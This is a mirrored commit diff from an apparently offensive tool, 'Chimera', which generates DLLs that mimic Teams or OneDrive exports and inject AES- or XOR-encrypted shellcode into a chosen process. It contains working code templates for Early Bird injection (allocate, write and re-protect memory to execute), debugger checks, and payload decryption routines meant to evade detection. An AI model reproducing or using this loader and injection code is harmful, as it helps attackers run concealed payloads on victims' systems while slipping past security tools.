mirror of
https://github.com/georgesotiriadis/Chimera
synced 2026-06-06 15:44:29 +00:00
v 2.0
refactored AES made changes to controller
This commit is contained in:
+7
-8
@@ -1,16 +1,15 @@
|
||||
#pip install crypto, pycryptodome
|
||||
import sys
|
||||
from Crypto.Cipher import AES
|
||||
from Cryptodome.Cipher import AES
|
||||
from secrets import token_bytes
|
||||
from binascii import unhexlify
|
||||
import hashlib
|
||||
import random
|
||||
import hashlib
|
||||
|
||||
#keyAES = token_bytes(16)
|
||||
key = ''.join([chr(random.randint(0, 255)) for i in range(16)])
|
||||
keyAES = ''.join(['\\x' + hex(ord(x))[2:].zfill(2) for x in key])
|
||||
key = token_bytes(16)
|
||||
keyAES = ''.join([f"\\x{byte:02x}" for byte in key])
|
||||
|
||||
def encryptAES(plaintext,keyAES):
|
||||
def encryptAES(plaintext, keyAES):
|
||||
|
||||
def pad(s):
|
||||
padding_length = AES.block_size - len(s) % AES.block_size
|
||||
@@ -18,7 +17,7 @@ def encryptAES(plaintext,keyAES):
|
||||
return s + padding
|
||||
|
||||
def aesenc(plaintext, keyAES):
|
||||
k = hashlib.sha256(keyAES).digest()
|
||||
k = hashlib.sha256(keyAES.encode()).digest()
|
||||
iv = bytes(16)
|
||||
cipher = AES.new(k, AES.MODE_CBC, iv)
|
||||
ciphertext = cipher.encrypt(pad(plaintext))
|
||||
@@ -26,4 +25,4 @@ def encryptAES(plaintext,keyAES):
|
||||
|
||||
ciphertext = aesenc(plaintext, keyAES)
|
||||
|
||||
return str(ciphertext)
|
||||
return str(ciphertext)
|
||||
@@ -0,0 +1,13 @@
|
||||
def Choose_Decryption(encryption_type,xor_func,shellcode_var,key_var):
|
||||
xor_dec=f"""
|
||||
{xor_func}({shellcode_var}, sizeof({shellcode_var}), {key_var}, sizeof({key_var}));
|
||||
"""
|
||||
|
||||
aes_dec=f"""
|
||||
AESDecrypt((char *) {shellcode_var}, sizeof({shellcode_var}), (char *) {key_var}, sizeof({key_var}));
|
||||
"""
|
||||
|
||||
if encryption_type == "AES":
|
||||
return aes_dec
|
||||
else:
|
||||
return xor_dec
|
||||
@@ -0,0 +1,51 @@
|
||||
def ChosenEncryption(encryption_type,xor_func):
|
||||
|
||||
aes = f"""
|
||||
int AESDec(char* size, unsigned int size_len, char* encryptionKey, size_t keySize) {{
|
||||
HCRYPTPROV hHash;
|
||||
HCRYPTHASH hHaHash;
|
||||
HCRYPTKEY hencryptionKey;
|
||||
|
||||
if (!CryptAcquireContextW(&hHash, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)) {{
|
||||
return -1;
|
||||
}}
|
||||
if (!CryptCreateHash(hHash, CALG_SHA_256, 0, 0, &hHaHash)) {{
|
||||
return -1;
|
||||
}}
|
||||
if (!CryptHashData(hHaHash, (BYTE*)encryptionKey, (DWORD)keySize, 0)) {{
|
||||
return -1;
|
||||
}}
|
||||
if (!CryptDeriveKey(hHash, CALG_AES_256, hHaHash, 0, &hencryptionKey)) {{
|
||||
return -1;
|
||||
}}
|
||||
|
||||
if (!CryptDecrypt(hencryptionKey, (HCRYPTHASH)NULL, 0, 0, (BYTE*)size, (DWORD*)&size_len)) {{
|
||||
return -1;
|
||||
}}
|
||||
|
||||
CryptReleaseContext(hHash, 0);
|
||||
CryptDestroyHash(hHaHash);
|
||||
CryptDestroyKey(hencryptionKey);
|
||||
|
||||
return 0;
|
||||
}}
|
||||
"""
|
||||
|
||||
xor=f"""
|
||||
void {xor_func}(unsigned char* data, size_t data_len, char* key, size_t key_len)
|
||||
{{
|
||||
int j;
|
||||
j = 0;
|
||||
for (int i = 0; i < data_len; i++)
|
||||
{{
|
||||
if (j == key_len - 1) j = 0;
|
||||
data[i] = data[i] ^ key[j];
|
||||
j++;
|
||||
}}
|
||||
}};
|
||||
"""
|
||||
|
||||
if encryption_type == "AES":
|
||||
return aes
|
||||
else:
|
||||
return xor
|
||||
@@ -1,4 +1,5 @@
|
||||
def EarlyBird(shellcode_var,ciphertext_split,process_to_inject,time,xor_func,key_var,key_hex):
|
||||
from Encryption.Choose_Decryption import Choose_Decryption
|
||||
def EarlyBird(shellcode_var,ciphertext_split,process_to_inject,time,xor_func,key_var,key_hex,encryption_type):
|
||||
EarlyBird_Injection=f"""
|
||||
unsigned char {shellcode_var}[] = {ciphertext_split}
|
||||
|
||||
@@ -47,7 +48,10 @@ def EarlyBird(shellcode_var,ciphertext_split,process_to_inject,time,xor_func,key
|
||||
CheckRemoteDebuggerPresent(GetCurrentProcess(), &bIsDbgPresent);
|
||||
// Allocate Virtual Memory
|
||||
NtAllocateVirtualMemory(victimProcess, &allocation_start, 0, (PULONG64)&allocation_size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
|
||||
{xor_func}({shellcode_var}, sizeof({shellcode_var}), {key_var}, sizeof({key_var}));
|
||||
|
||||
|
||||
{Choose_Decryption(encryption_type,xor_func,shellcode_var,key_var)}
|
||||
|
||||
// Copy shellcode into allocated memory
|
||||
NtWriteVirtualMemory(victimProcess, allocation_start, {shellcode_var}, sizeof({shellcode_var}), 0);
|
||||
NtProtectVirtualMemory(victimProcess, &allocation_start, (PSIZE_T)&allocation_size, PAGE_EXECUTE_READ, &oldProtect);
|
||||
|
||||
@@ -13,9 +13,9 @@ def parse_arguments():
|
||||
parser.add_argument("--pname", "-n", help="Name of process to inject shellcode into",
|
||||
type=str,metavar='',required=True)
|
||||
parser.add_argument("--dexports", "-d", help="Specify which DLL Exports you want to use either teams or onedrive",
|
||||
type=str,metavar='',choices=['teams', 'onedrive'],required=True)
|
||||
type=str,nargs=1,metavar='',choices=['teams', 'onedrive'],required=True)
|
||||
parser.add_argument("--enc", "-e", help="Specify which encryption you prefer (XOR / AES)",
|
||||
type=str,metavar='',choices=['XOR', 'AES'],required=True)
|
||||
type=str,nargs=1,metavar='',choices=['XOR', 'AES'],required=True)
|
||||
parser.add_argument("--inj", "-i", help="Specify which injection technique you prefer (EB / MS)",
|
||||
type=str,metavar='',choices=['EB', 'MS'],required=True)
|
||||
parser.add_argument("--rshell", "-s", help="[Optional] Replace shellcode variable name with a unique name",
|
||||
|
||||
@@ -1,6 +1,6 @@
|
||||
from Injection.EarlyBird_Injection import EarlyBird
|
||||
from Injection.Module_Stomping import ModuleStomping
|
||||
from Encryption.chosen_encryption import ChosenEncryption
|
||||
from Encryption.Choose_Encryption import ChosenEncryption
|
||||
|
||||
# here we specify the DLL skeleton
|
||||
def template(file_contents,xor_func,shellcode_var,ciphertext_split,key_var,key_hex,process_to_inject,time,injection,encryption_type):
|
||||
@@ -91,7 +91,7 @@ def template(file_contents,xor_func,shellcode_var,ciphertext_split,key_var,key_h
|
||||
DWORD WINAPI DoMagic(LPVOID lpParameter)
|
||||
{{
|
||||
{
|
||||
EarlyBird(shellcode_var, ciphertext_split, process_to_inject, time, xor_func, key_var, key_hex)
|
||||
EarlyBird(shellcode_var, ciphertext_split, process_to_inject, time, xor_func, key_var, key_hex,encryption_type)
|
||||
if injection == "EB" else ModuleStomping() if injection == "MS" else ""
|
||||
}
|
||||
|
||||
|
||||
@@ -2,7 +2,7 @@ import random
|
||||
import os
|
||||
|
||||
from Dll_Names.Dlls import dll_names
|
||||
from Encryption.Xor import DoXor,key,key_hex
|
||||
from Encryption.XOR import DoXor,key,key_hex
|
||||
from Templates.Split_Xor_Shellcode import split_xor_shellcode
|
||||
from Templates.C_Template import template
|
||||
from Templates.Arguments import parse_arguments
|
||||
@@ -20,7 +20,7 @@ def Controller():
|
||||
args = parse_arguments()
|
||||
try:
|
||||
plaintext = open(args.raw[0],"rb").read()
|
||||
output_folder = args.path[0]
|
||||
output_folder = args.path
|
||||
process_to_inject = args.pname
|
||||
file_alias = args.dexports[0]
|
||||
if file_alias not in array_dll_names:
|
||||
@@ -28,10 +28,10 @@ def Controller():
|
||||
sys.exit(1)
|
||||
file_option = array_dll_names[file_alias]
|
||||
encryption_type = args.enc[0]
|
||||
injection = args.inj[0]
|
||||
shellcode_var =args.rshell[0]
|
||||
xor_func = args.rxor[0]
|
||||
key_var = args.rkey[0]
|
||||
injection = args.inj
|
||||
shellcode_var =args.rshell
|
||||
xor_func = args.rxor
|
||||
key_var = args.rkey
|
||||
time = args.rsleep
|
||||
except:
|
||||
parse_arguments()
|
||||
|
||||
Reference in New Issue
Block a user